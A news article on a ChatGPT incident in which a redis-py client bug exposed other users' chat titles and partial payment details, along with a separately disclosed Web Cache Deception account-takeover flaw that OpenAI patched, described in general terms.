ChatGPT could not find vulnerabilities in its own system. How vulnerabilities allowed user account takeover and leaked payment data

An flaw in an open-source library was the cause of an outage that occurred earlier this week for the ChatGPT service, according to OpenAI’s disclosure. Due to the flaw, some users were able to read titles from the chat history of other current users, and in some instances, they were able to see the first message of a discussion that had just begun. As a direct consequence of this, OpenAI pulled ChatGPT down in order to address the issue. The flaw has been fixed, and the ChatGPT service has been brought back online, along with the functionality that allows users to see their conversation history, with the exception of the most recent few hours of data.

Nevertheless, after doing more research, OpenAI revealed that the same flaw may have been responsible for making the payment-related information of 1.2% of ChatGPT Plus customers public to other users. This information consisted of the last four digits of a credit card number, an email address, a payment address, and the expiry date of the credit card. On the other hand, whole credit card numbers were never made public in any way.

OpenAI has come to the conclusion that the number of people whose data was really shared with a third party is very marginal. In order to have access to this information, a ChatGPT Plus customer would have required to either view a subscription confirmation email that was delivered on March 20 between 1 a.m. and 10 a.m. Pacific time, or click on “My Account,” then “Change my subscription,” within the same time range.

OpenAI has reached out to the impacted users to inform them of the situation and reassured them that their data is not at any further danger. The firm places a high priority on ensuring the privacy and safety of its users’ data and has expressed regret that it has not been able to live up to its promise of preserving its customers’ confidentiality. OpenAI is committed to restoring users’ faith in the organization and will continue to take steps to enhance its processes.

The flaw was found in the open-source version of the Redis client library known as redis-py. As soon as OpenAI realized there was a problem, they contacted the people that maintain Redis and provided them with a fix in the form of a patch. It was discovered that the Asyncio redis-py client for Redis Cluster had a problem, and that issue has now been resolved.

On the other hand, a different security researcher named Nagali discovered a critical account takeover vulnerability in the OpenAI ChatGPT application. This flaw gave an attacker the ability to take control of another user’s account, view their billing information, and access their chat history without the user’s knowledge. Since then, OpenAI’s team has patched this issue, and they expressed their gratitude to the researcher for responsibly disclosing it to them.

An investigation by a security researcher into the flow of authentication in ChatGPT’s requests led to the discovery of an unusual behavior in the GET request, which prompted the researcher to report the vulnerability. The researcher was able to take advantage of “Web Cache Deception” since the request collected the account context from the server. This context included the researcher’s email address, name, picture, and accessToken.

A vulnerability known as “Web Cache Deception” is one that enables an adversary to manipulate web cache servers in order to store sensitive information inside a cached response. An attacker may deceive the cache server into keeping sensitive data by constructing a particular request with a changed file extension, which can then be read at a later time. This allows the attacker to get access to the data.